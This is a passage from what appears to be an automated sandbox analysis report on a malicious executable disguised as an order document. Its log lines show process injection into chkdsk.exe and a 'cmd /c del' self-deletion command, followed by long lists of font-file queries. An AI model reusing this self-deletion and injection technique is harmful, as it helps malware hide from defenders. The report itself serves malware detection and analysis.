          Source: C:\Windows\SysWOW64\chkdsk.exeThread register set: target process: 3424Jump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeProcess created: C:\Users\user\Desktop\document de commande.exe C:\Users\user\Desktop\document de commande.exeJump to behavior
          Source: C:\Windows\SysWOW64\chkdsk.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\document de commande.exe'Jump to behavior
          Source: explorer.exe, 00000004.00000000.721172067.0000000000AD8000.00000004.00000020.sdmpBinary or memory string: ProgmanMD6
          Source: explorer.exe, 00000004.00000000.721558730.0000000001080000.00000002.00020000.sdmp, chkdsk.exe, 00000009.00000002.933070838.0000000006110000.00000002.00020000.sdmpBinary or memory string: Program Manager
          Source: explorer.exe, 00000004.00000000.687772546.0000000005E50000.00000004.00000001.sdmp, chkdsk.exe, 00000009.00000002.933070838.0000000006110000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000004.00000000.721558730.0000000001080000.00000002.00020000.sdmp, chkdsk.exe, 00000009.00000002.933070838.0000000006110000.00000002.00020000.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000004.00000000.721558730.0000000001080000.00000002.00020000.sdmp, chkdsk.exe, 00000009.00000002.933070838.0000000006110000.00000002.00020000.sdmpBinary or memory string: Progmanlock
          Source: explorer.exe, 00000004.00000000.730364449.000000000A716000.00000004.00000001.sdmpBinary or memory string: Shell_TrayWnd5D
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Users\user\Desktop\document de commande.exe VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\consola.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\document de commande.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformationJump to behavior
